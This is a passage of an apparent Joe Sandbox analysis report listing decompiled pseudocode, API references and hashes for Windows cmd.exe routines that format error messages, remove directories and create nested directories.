                                    				_t24 =  *0x11fd0b4; // 0x2833377e
                                    				_v12 = _t24 ^ _t60;
                                    				_t59 = _a4;
                                    				_v120 =  &_a16;
                                    				_v116 = 0;
                                    				_t29 = FormatMessageW(0x1900, 0, _a8, 0,  &_v116, 0xa,  &_v120);
                                    				_v120 = 0;
                                    				if(_t29 != 0) {
                                    					L5:
                                    					E011E6B76(_t59, L"%s", _v116);
                                    					_t56 =  *((intOrPtr*)(_t59 + 0x10));
                                    					if(E011DBED7(_t59,  *((intOrPtr*)(_t59 + 0x10))) != 0) {
                                    						E011DB6CB(_t59);
                                    					}
                                    					LocalFree(_v116);
                                    					_t33 = 0;
                                    				} else {
                                    					__imp___ultoa(_a8,  &_v44, 0x10);
                                    					_t38 = E011E0638(GetACP());
                                    					asm("sbb eax, eax");
                                    					MultiByteToWideChar(0,  ~( ~_t38),  &_v44, 0xffffffff,  &_v112, 0x20);
                                    					_v128 =  &_v112;
                                    					_t43 = L"Application";
                                    					if(_a8 < 0x2328) {
                                    						_t43 = L"System";
                                    					}
                                    					_v124 = _t43;
                                    					_t46 = FormatMessageW(0x3100, 0, 0x13d, 0,  &_v116, 0xa,  &_v128);
                                    					if(_t46 != 0) {
                                    						goto L5;
                                    					} else {
                                    						_t33 = _t46 + 1;
                                    					}
                                    				}
                                    				return E011E6FD0(_t33, _t47, _v12 ^ _t60, _t56, 0, _t59);
                                    			}






















                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 011F7CB9
                                    • _ultoa.MSVCRT ref: 011F7CCF
                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011F7CD8
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,011FA21D,000000FF,?,00000020), ref: 011F7CF9
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 011F7D31
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 011F7D65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                    • String ID: (#$Application$System
                                    • API String ID: 3377411628-593978566
                                    • Opcode ID: 722dc52f7f8049c73965e17574857151c91a28a50a61468af6658aa434f25b9a
                                    • Instruction ID: 6dcdd1b9fc6f390178417ddb2751552c779f80dbc392e63d76c9a12e2a66fd9c
                                    • Opcode Fuzzy Hash: 722dc52f7f8049c73965e17574857151c91a28a50a61468af6658aa434f25b9a
                                    • Instruction Fuzzy Hash: 1D318D71A00208ABDF25DFA5DC08DEE7BB9FB99714F60422DE911E7180EB309941CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 92%
                                    			E011D8885(WCHAR* __ecx) {
                                    				signed int _v8;
                                    				short _v12;
                                    				short _v14;
                                    				short _v16;
                                    				WCHAR* _v20;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t8;
                                    				long _t15;
                                    				signed int _t17;
                                    				void* _t22;
                                    				void* _t26;
                                    				WCHAR* _t27;
                                    				long _t28;
                                    				signed int _t29;
                                    
                                    				_t8 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t8 ^ _t29;
                                    				_t27 = __ecx;
                                    				_t28 = 0;
                                    				if(GetFullPathNameW(__ecx, 4,  &_v16,  &_v20) == 3) {
                                    					if(_v14 != 0x3a || _v12 != 0x5c) {
                                    						goto L1;
                                    					} else {
                                    						_t15 = 0;
                                    						L3:
                                    						return E011E6FD0(_t15, _t22, _v8 ^ _t29, _t26, _t27, _t28);
                                    					}
                                    				}
                                    				L1:
                                    				if(RemoveDirectoryW(_t27) == 0) {
                                    					_t28 = GetLastError();
                                    					if(_t28 == 5) {
                                    						_t17 = GetFileAttributesW(_t27);
                                    						if(_t17 != 0xffffffff && (_t17 & 0x00000001) != 0 && SetFileAttributesW(_t27, _t17 & 0xfffffffe) != 0) {
                                    							if(RemoveDirectoryW(_t27) == 0) {
                                    								_t28 = GetLastError();
                                    							} else {
                                    								_t28 = 0;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				_t15 = _t28;
                                    				goto L3;
                                    			}

                                    APIs
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88A8
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88B8
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0650
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0662
                                    • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F067E
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F068D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                    • String ID: :$\
                                    • API String ID: 3961617410-1166558509
                                    • Opcode ID: 9363cbeb5b863c2f79b934e8eba0d316866dfdb0afcb4254c7910fdf505969f9
                                    • Instruction ID: 4d899fcd761e5aa527f7c1f72e3e70dc2bcc79a9c61047da9cbfac441b95da2d
                                    • Opcode Fuzzy Hash: 9363cbeb5b863c2f79b934e8eba0d316866dfdb0afcb4254c7910fdf505969f9
                                    • Instruction Fuzzy Hash: C011A331E00114AB9B39EB68B85D57E7BB9EB95764B15022CF917E2148EF708941C2A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E011E2DD2(signed char* __ecx, signed int __edx) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				int _v556;
                                    				char _v560;
                                    				int _v564;
                                    				void _v1084;
                                    				int _v1092;
                                    				char _v1096;
                                    				int _v1100;
                                    				void _v1620;
                                    				int _v1628;
                                    				char _v1632;
                                    				int _v1636;
                                    				void _v2156;
                                    				signed int _v2160;
                                    				signed int _v2164;
                                    				signed int _v2168;
                                    				int _v2172;
                                    				signed int _v2176;
                                    				intOrPtr* _v2180;
                                    				signed char* _v2184;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t132;
                                    				signed int _t149;
                                    				void* _t169;
                                    				signed int _t171;
                                    				signed int _t181;
                                    				signed int _t182;
                                    				void* _t184;
                                    				signed int _t185;
                                    				signed int _t187;
                                    				signed int _t191;
                                    				signed int _t192;
                                    				intOrPtr* _t194;
                                    				signed int _t195;
                                    				signed int _t201;
                                    				signed int _t212;
                                    				signed int _t213;
                                    				signed int _t215;
                                    				intOrPtr _t216;
                                    				signed int _t217;
                                    				signed int _t219;
                                    				signed int _t220;
                                    				signed int _t222;
                                    				void* _t243;
                                    				signed int _t245;
                                    				signed int _t248;
                                    				signed int _t265;
                                    				void* _t271;
                                    				signed int _t278;
                                    				signed int _t280;
                                    				intOrPtr* _t282;
                                    				signed int _t284;
                                    				signed char* _t285;
                                    				intOrPtr* _t286;
                                    				signed int _t289;
                                    
                                    				_t277 = __edx;
                                    				_t132 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t132 ^ _t289;
                                    				_t287 = 0x104;
                                    				_v2164 = 1;
                                    				_t222 = 0;
                                    				_v24 = 1;
                                    				_v2172 = 0;
                                    				_t285 = __ecx;
                                    				_v28 = 0;
                                    				_v2184 = __ecx;
                                    				_v20 = 0x104;
                                    				memset( &_v548, 0, 0x104);
                                    				_v1636 = 0;
                                    				_v1632 = 1;
                                    				_v1628 = 0x104;
                                    				memset( &_v2156, 0, 0x104);
                                    				_v564 = 0;
                                    				_v560 = 1;
                                    				_v556 = 0x104;
                                    				memset( &_v1084, 0, 0x104);
                                    				_v1100 = 0;
                                    				_v1096 = 1;
                                    				_v1092 = 0x104;
                                    				memset( &_v1620, 0, 0x104);
                                    				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v2156, ((0 | _v1632 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					L10:
                                    					_t149 = 1;
                                    					goto L11;
                                    				} else {
                                    					_t169 = E011E0C70( &_v1620, ((0 | _v1096 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
                                    					_t302 = _t169;
                                    					if(_t169 < 0 || E011E4E94( &_v2176, _t277, _t302) == 1) {
                                    						goto L10;
                                    					} else {
                                    						_t287 = _v2176;
                                    						_t171 =  *_t285;
                                    						if( *_t287 == 0) {
                                    							_t171 = _t171 & 0xfffffff7;
                                    							 *_t285 = _t171;
                                    						}
                                    						if((_t171 & 0x00000008) != 0) {
                                    							 *((intOrPtr*)(_t287 + 0x24)) =  *((intOrPtr*)(_t287 + 0x1c)) - 1;
                                    							_t171 =  *_t285;
                                    						}
                                    						if((_t171 & 0x00000200) != 0) {
                                    							 *_t285 = _t171 | 0x00000004;
                                    						}
                                    						 *0x1213cf0 = _t222;
                                    						_t277 = 1;
                                    						if(E011E4800(_t285, 1, 1,  &_v2160) != 1) {
                                    							_v2168 = _t222;
                                    							E011E0D89(1, 0x11d24ac);
                                    							E011E0D89(1, 0x11d24ac);
                                    							_t222 = _v2160;
                                    							while(1) {
                                    								__eflags = _t222;
                                    								if(_t222 == 0) {
                                    									break;
                                    								}
                                    								E011E0D89(_t277,  *(_t222 + 4));
                                    								__eflags =  *((char*)(_t222 + 0x10));
                                    								_t181 =  *_t285;
                                    								if( *((char*)(_t222 + 0x10)) != 0) {
                                    									_t181 = _t181 | 0x00000100;
                                    									 *_t285 = _t181;
                                    									__eflags = _t285[0x5c];
                                    									if(_t285[0x5c] == 0) {
                                    										L18:
                                    										__eflags = _t181 & 0x00000040;
                                    										if((_t181 & 0x00000040) == 0) {
                                    											_t182 = _v28;
                                    											__eflags = _t182;
                                    											if(_t182 == 0) {
                                    												_t182 =  &_v548;
                                    											}
                                    											E011E0D89(_t277, _t182);
                                    											_t278 =  *(_t222 + 4);
                                    											_t243 = _t278 + 2;
                                    											do {
                                    												_t184 =  *_t278;
                                    												_t278 = _t278 + 2;
                                    												__eflags = _t184 - _v2172;
                                    											} while (_t184 != _v2172);
                                    											_t185 = _v28;
                                    											_t280 = _t278 - _t243 >> 1;
                                    											__eflags = _t185;
                                    											if(_t185 == 0) {
                                    												_t185 =  &_v548;
                                    											}
                                    											_t277 = _t280 + 1;
                                    											E011E4C89( *(_t222 + 4), _t280 + 1, _t185, _v20);
                                    											_t245 = _v1636;
                                    											__eflags = _t245;
                                    											if(_t245 == 0) {
                                    												_t245 =  &_v2156;
                                    											}
                                    											_t187 = _v28;
                                    											__eflags = _t187;
                                    											if(_t187 == 0) {
                                    												_t187 =  &_v548;
                                    											}
                                    											__imp___wcsicmp(_t187, _t245);
                                    											__eflags = _t187;
                                    											if(_t187 == 0) {
                                    												goto L19;
                                    											} else {
                                    												__eflags = _v2168;
                                    												if(_v2168 == 0) {
                                    													L48:
                                    													_t277 =  *(_t222 + 4);
                                    													_t219 = E011FA834(_t287,  *(_t222 + 4));
                                    													__eflags = _t219;
                                    													if(_t219 != 0) {
                                    														goto L10;
                                    													}
                                    													goto L19;
                                    												}
                                    												_t220 = E011DB610(_t222, _t287, _t285);
                                    												__eflags = _t220;
                                    												if(_t220 != 0) {
                                    													goto L10;
                                    												}
                                    												goto L48;
                                    											}
                                    										}
                                    										L19:
                                    										_t248 =  *_t285;
                                    										_t285[0x64] = 0;
                                    										_t285[0x60] = 0;
                                    										_t285[0x68] = 0;
                                    										_t191 = (_t248 & 0x00000010 | 0x00000020) >> 4;
                                    										_t285[0x6c] = 0;
                                    										__eflags = _t248 & 0x00020400;
                                    										if((_t248 & 0x00020400) != 0) {
                                    											_t191 = _t191 | 0x00000004;
                                    										}
                                    										asm("sbb ecx, ecx");
                                    										_t277 = _t287;
                                    										_t253 = _t222;
                                    										_t192 = E011E5266(_t222, _t287, _t285[4], _t285[8], _t191, _t285, 0, E011E65F0,  !( ~(_t248 & 0x00004004)) & E011E6550, E011E64F0);
                                    										_v2164 = _t192;
                                    										__eflags = _t192;
                                    										if(_t192 != 0) {
                                    											L70:
                                    											__eflags =  *0x11fd544;
                                    											if( *0x11fd544 != 0) {
                                    												goto L23;
                                    											}
                                    											__eflags = _t192 - 5;
                                    											if(_t192 != 5) {
                                    												__eflags = _t285[0x60] + _t285[0x64];
                                    												if(_t285[0x60] + _t285[0x64] != 0) {
                                    													goto L23;
                                    												}
                                    												E011DB6CB(_t287);
                                    												__eflags = 0;
                                    												_push(0);
                                    												_push(0x40002711);
                                    												E011DC5A2(_t287);
                                    												_v2164 = 1;
                                    												L75:
                                    												goto L23;
                                    											}
                                    											_push(0);
                                    											_push(5);
                                    											E011DC5A2(_t253);
                                    											goto L75;
                                    										} else {
                                    											__eflags = _t285[0x60] + _t285[0x64];
                                    											if(_t285[0x60] + _t285[0x64] == 0) {
                                    												_t192 = _v2164;
                                    												goto L70;
                                    											}
                                    											__eflags =  *_t285 & 0x00000040;
                                    											if(( *_t285 & 0x00000040) == 0) {
                                    												E011E0D89(_t277, 0x11d24ac);
                                    												_t212 =  *_t222;
                                    												__eflags = _t212;
                                    												if(_t212 == 0) {
                                    													L57:
                                    													_t265 = _v28;
                                    													__eflags = _t265;
                                    													if(_t265 == 0) {
                                    														_t265 =  &_v548;
                                    													}
                                    													_t213 = _v564;
                                    													__eflags = _t213;
                                    													if(_t213 == 0) {
                                    														_t213 =  &_v1084;
                                    													}
                                    													__imp___wcsicmp(_t213, _t265);
                                    													__eflags = _t213;
                                    													if(_t213 == 0) {
                                    														goto L23;
                                    													} else {
                                    														__eflags =  *_t285 & 0x00000010;
                                    														if(( *_t285 & 0x00000010) == 0) {
                                    															L65:
                                    															_t277 = _v1100;
                                    															__eflags = _v1100;
                                    															if(__eflags == 0) {
                                    																_t277 =  &_v1620;
                                    															}
                                    															_t149 = E011FA0D2(_t287, _t277, __eflags,  *_t285, _t285[0x64]);
                                    															__eflags = _t149;
                                    															if(_t149 != 0) {
                                    																L11:
                                    																_v2164 = _t149;
                                    																L12:
                                    																__imp__??_V@YAXPAX@Z(_v1100);
                                    																__imp__??_V@YAXPAX@Z(_v564);
                                    																__imp__??_V@YAXPAX@Z(_v1636);
                                    																__imp__??_V@YAXPAX@Z();
                                    																return E011E6FD0(_v2164, _t222, _v8 ^ _t289, _t277, _t285, _t287, _v28);
                                    															} else {
                                    																goto L23;
                                    															}
                                    														}
                                    														_t149 = E011DB610(_t222, _t287, _t285);
                                    														__eflags = _t149;
                                    														if(__eflags != 0) {
                                    															goto L11;
                                    														}
                                    														_t277 = _t285[0x60];
                                    														_t149 = E011FA7F6(_t222, _t287, _t285[0x60], __eflags,  &(_t285[0x68]),  *_t285);
                                    														__eflags = _t149;
                                    														if(_t149 != 0) {
                                    															goto L11;
                                    														}
                                    														goto L65;
                                    													}
                                    												}
                                    												_t215 =  *((intOrPtr*)(_t212 + 4));
                                    												_t282 = _t215;
                                    												_v2160 = _t215;
                                    												_t271 = _t282 + 2;
                                    												do {
                                    													_t216 =  *_t282;
                                    													_t282 = _t282 + 2;
                                    													__eflags = _t216 - _v2172;
                                    												} while (_t216 != _v2172);
                                    												_t217 = _v564;
                                    												_t284 = _t282 - _t271 >> 1;
                                    												__eflags = _t217;
                                    												if(_t217 == 0) {
                                    													_t217 =  &_v1084;
                                    												}
                                    												_t277 = _t284 + 1;
                                    												__eflags = _t284 + 1;
                                    												E011E4C89(_v2160, _t284 + 1, _t217, _v556);
                                    												goto L57;
                                    											}
                                    											L23:
                                    											E011E0040( *(_t222 + 4));
                                    											_t194 =  *((intOrPtr*)(_t222 + 0xc));
                                    											_v2180 = _t194;
                                    											_v2160 = 1;
                                    											__eflags =  *((intOrPtr*)(_t222 + 8)) - 1;
                                    											if( *((intOrPtr*)(_t222 + 8)) < 1) {
                                    												L27:
                                    												_t195 = _v2168;
                                    												__eflags = _t195;
                                    												if(_t195 != 0) {
                                    													E011E0040(_t195);
                                    												}
                                    												_v2168 = _t222;
                                    												_t222 =  *_t222;
                                    												continue;
                                    											}
                                    											_t286 = _t194;
                                    											do {
                                    												E011E0040( *_t286);
                                    												E011E0040( *((intOrPtr*)(_t286 + 4)));
                                    												E011E0040(_t286);
                                    												_t286 =  *((intOrPtr*)(_t286 + 0xc));
                                    												_t201 = _v2160 + 1;
                                    												_v2160 = _t201;
                                    												__eflags = _t201 -  *((intOrPtr*)(_t222 + 8));
                                    											} while (_t201 <=  *((intOrPtr*)(_t222 + 8)));
                                    											_t285 = _v2184;
                                    											_t287 = _v2176;
                                    											goto L27;
                                    										}
                                    									}
                                    									_push(0);
                                    									_push(0x40002713);
                                    									E011DC5A2(0);
                                    									goto L10;
                                    								}
                                    								__eflags = _t181 & 0x00020000;
                                    								if((_t181 & 0x00020000) == 0) {
                                    									_t181 = _t181 | 0x00000002;
                                    									__eflags = _t181;
                                    									 *_t285 = _t181;
                                    								}
                                    								goto L18;
                                    							}
                                    							E011DB6CB(_t287);
                                    							goto L12;
                                    						} else {
                                    							goto L10;
                                    						}
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011E2E1C
                                    • memset.MSVCRT ref: 011E2E40
                                    • memset.MSVCRT ref: 011E2E64
                                    • memset.MSVCRT ref: 011E2E88
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F81
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F8E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F9B
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2FA5
                                      • Part of subcall function 011E4E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$BufferConsoleInfoScreen
                                    • String ID:
                                    • API String ID: 1034426908-0
                                    • Opcode ID: 6126e0924b132e4afb6b0895a71737dd6ef4bc6d0b98dc3fe17df98e6ccef046
                                    • Instruction ID: 0d9978aa5c54a0c9e1598d9a801b889e23451e6f4f1ce1c119389dcb5bd3e0ea
                                    • Opcode Fuzzy Hash: 6126e0924b132e4afb6b0895a71737dd6ef4bc6d0b98dc3fe17df98e6ccef046
                                    • Instruction Fuzzy Hash: 8AE19071A00A1A9BDF2DDFA5DC58AAABBF5FF54314F044099E50997240EB34EE80CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 48%
                                    			E011DBF30(short* __edx, WCHAR* _a4) {
                                    				signed int _v8;
                                    				long _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				WCHAR* _v552;
                                    				short* _v556;
                                    				short* _v560;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t47;
                                    				void* _t49;
                                    				long _t59;
                                    				struct _SECURITY_ATTRIBUTES* _t61;
                                    				WCHAR* _t63;
                                    				long _t64;
                                    				WCHAR* _t67;
                                    				WCHAR* _t68;
                                    				WCHAR* _t69;
                                    				signed int _t70;
                                    				signed int _t71;
                                    				short* _t73;
                                    				void* _t74;
                                    				WCHAR* _t76;
                                    				WCHAR* _t80;
                                    				signed int _t81;
                                    				signed int _t82;
                                    				struct _SECURITY_ATTRIBUTES* _t86;
                                    				signed int _t88;
                                    				short* _t89;
                                    				signed int _t97;
                                    				short* _t100;
                                    				WCHAR* _t101;
                                    				WCHAR* _t103;
                                    				WCHAR* _t104;
                                    				struct _SECURITY_ATTRIBUTES* _t105;
                                    				void* _t106;
                                    				signed int _t107;
                                    
                                    				_t100 = __edx;
                                    				_t47 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t47 ^ _t107;
                                    				_t104 = _a4;
                                    				_t49 = 0x3a;
                                    				if(_t104[1] != _t49) {
                                    					L2:
                                    					_t105 = 0;
                                    					_v20 = 0x104;
                                    					_v28 = 0;
                                    					_t86 = 1;
                                    					_v24 = 1;
                                    					memset( &_v548, 0, 0x104);
                                    					_t91 =  &_v548;
                                    					if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    						_t59 = 8;
                                    						L39:
                                    						_push(_t105);
                                    						_push(_t59);
                                    						L40:
                                    						E011DC5A2(_t91);
                                    						L8:
                                    						_t105 = _t86;
                                    						L9:
                                    						__imp__??_V@YAXPAX@Z(_v28);
                                    						_t61 = _t105;
                                    						L10:
                                    						return E011E6FD0(_t61, _t86, _v8 ^ _t107, _t100, _t104, _t105);
                                    					}
                                    					_t63 = _v28;
                                    					if(_t63 == 0) {
                                    						_t63 =  &_v548;
                                    					}
                                    					_t91 =  &_v552;
                                    					_t64 = GetFullPathNameW(_t104, _v20, _t63,  &_v552);
                                    					if(_t64 == 0) {
                                    						_t59 = GetLastError();
                                    						goto L39;
                                    					} else {
                                    						if(_t64 >= 0x7fe7) {
                                    							_push(_t104);
                                    							_push(_t86);
                                    							_push(0x400023d9);
                                    							L43:
                                    							E011DC5A2(_t91);
                                    							goto L8;
                                    						}
                                    						if(CreateDirectoryW(_t104, _t105) == 0) {
                                    							_t59 = GetLastError();
                                    							if(_t59 == 0xb7) {
                                    								_push(_t104);
                                    								_push(_t86);
                                    								_push(0x235c);
                                    								goto L43;
                                    							}
                                    							if(_t59 != 3) {
                                    								goto L39;
                                    							}
                                    							if( *0x1213cc9 == 0) {
                                    								L29:
                                    								_push(_t105);
                                    								_push(0x52);
                                    								goto L40;
                                    							}
                                    							_t91 = _v28;
                                    							_t67 = _t91;
                                    							if(_t91 == 0) {
                                    								_t67 =  &_v548;
                                    							}
                                    							_t100 = 0x5c;
                                    							_t104 = 0x3a;
                                    							_v560 = _t100;
                                    							if(_t67[1] != _t104) {
                                    								_t68 = _t91;
                                    								if(_t91 == 0) {
                                    									_t68 =  &_v548;
                                    								}
                                    								if( *_t68 != _t100) {
                                    									goto L29;
                                    								} else {
                                    									_t69 = _t91;
                                    									if(_t91 == 0) {
                                    										_t69 =  &_v548;
                                    									}
                                    									if(_t69[1] != _t100) {
                                    										goto L29;
                                    									} else {
                                    										_t101 = _t91;
                                    										if(_t91 == 0) {
                                    											_t101 =  &_v548;
                                    										}
                                    										_t100 =  &(_t101[2]);
                                    										_v552 = _t100;
                                    										_t104 = _t100;
                                    										_t70 =  *_t100 & 0x0000ffff;
                                    										if(_t70 == 0) {
                                    											L59:
                                    											if( *_t100 != _t105) {
                                    												_t100 =  &(_t104[1]);
                                    												_v552 = _t100;
                                    												_t104 = _t100;
                                    											}
                                    											_t71 =  *_t100 & 0x0000ffff;
                                    											if(_t71 == 0) {
                                    												goto L30;
                                    											}
                                    											_v556 = _t71;
                                    											_t88 = _t71;
                                    											while(1) {
                                    												_t73 = _t104;
                                    												if(_t88 == _v560) {
                                    													break;
                                    												}
                                    												_t100 =  &(_t104[1]);
                                    												_v552 = _t100;
                                    												_t104 = _t100;
                                    												_t81 =  *_t100 & 0x0000ffff;
                                    												_v556 = _t100;
                                    												_t88 = _t81;
                                    												if(_t81 != 0) {
                                    													continue;
                                    												}
                                    												_t73 = _t100;
                                    												break;
                                    											}
                                    											_t86 = 1;
                                    											if( *_t100 == _t105) {
                                    												goto L30;
                                    											}
                                    											_t100 =  &(_t73[1]);
                                    											goto L19;
                                    										}
                                    										_t89 = _t100;
                                    										_t97 = _t70;
                                    										_t106 = 0x5c;
                                    										while(1) {
                                    											_t104 = _t89;
                                    											if(_t97 == _t106) {
                                    												break;
                                    											}
                                    											_t100 =  &(_t89[1]);
                                    											_v552 = _t100;
                                    											_t89 = _t100;
                                    											_t82 =  *_t100 & 0x0000ffff;
                                    											_t104 = _t100;
                                    											_t97 = _t82;
                                    											if(_t82 != 0) {
                                    												continue;
                                    											}
                                    											break;
                                    										}
                                    										_t91 = _v28;
                                    										_t86 = 1;
                                    										_t105 = 0;
                                    										goto L59;
                                    									}
                                    								}
                                    							} else {
                                    								_t103 = _t91;
                                    								if(_t91 == 0) {
                                    									_t103 =  &_v548;
                                    								}
                                    								_t100 =  &(_t103[3]);
                                    								while(1) {
                                    									L19:
                                    									_v552 = _t100;
                                    									while(1) {
                                    										L20:
                                    										_t104 =  *_t100 & 0x0000ffff;
                                    										if(_t104 == 0) {
                                    											break;
                                    										} else {
                                    											goto L21;
                                    										}
                                    										while(1) {
                                    											L21:
                                    											_t74 = 0x5c;
                                    											if(_t104 == _t74) {
                                    												break;
                                    											}
                                    											_t100 =  &(_t100[1]);
                                    											_v552 = _t100;
                                    											_t80 =  *_t100 & 0x0000ffff;
                                    											_t104 = _t80;
                                    											if(_t80 != 0) {
                                    												continue;
                                    											}
                                    											_t104 = 0x5c;
                                    											if( *_t100 != _t104) {
                                    												goto L20;
                                    											}
                                    											L26:
                                    											 *_t100 = 0;
                                    											_t76 = _v28;
                                    											if(_t76 == 0) {
                                    												_t76 =  &_v548;
                                    											}
                                    											if(CreateDirectoryW(_t76, _t105) != 0 || GetLastError() == 0xb7) {
                                    												 *_v552 = _t104;
                                    												_t91 = _v28;
                                    												_t100 =  &(_v552[1]);
                                    												goto L19;
                                    											} else {
                                    												goto L29;
                                    											}
                                    										}
                                    										_t104 = 0x5c;
                                    										goto L26;
                                    									}
                                    									L30:
                                    									if(_t91 == 0) {
                                    										_t91 =  &_v548;
                                    									}
                                    									if(CreateDirectoryW(_t91, _t105) != 0) {
                                    										goto L9;
                                    									} else {
                                    										_t59 = GetLastError();
                                    										if(_t59 == 0xb7) {
                                    											goto L9;
                                    										} else {
                                    											goto L39;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    						_t86 = _t105;
                                    						goto L8;
                                    					}
                                    				}
                                    				_t98 =  *_t104;
                                    				if(E011E29BB( *_t104) == 0) {
                                    					_push(0);
                                    					_push(0xf);
                                    					E011DC5A2(_t98);
                                    					_t61 = 1;
                                    					goto L10;
                                    				}
                                    				goto L2;
                                    			}











































                                    APIs
                                    • memset.MSVCRT ref: 011DBF80
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011DBFC6
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DBFE1
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DBFF2
                                      • Part of subcall function 011E29BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(011E0B22,011E0B22,00007FE7), ref: 011E29E9
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC00E
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0C0
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC0CA
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0E5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011EA502
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                    • String ID:
                                    • API String ID: 402963468-0
                                    • Opcode ID: b70cf01f259ef184adec374738a7905b66bbb10c612044aac7d31b3976c0d51c
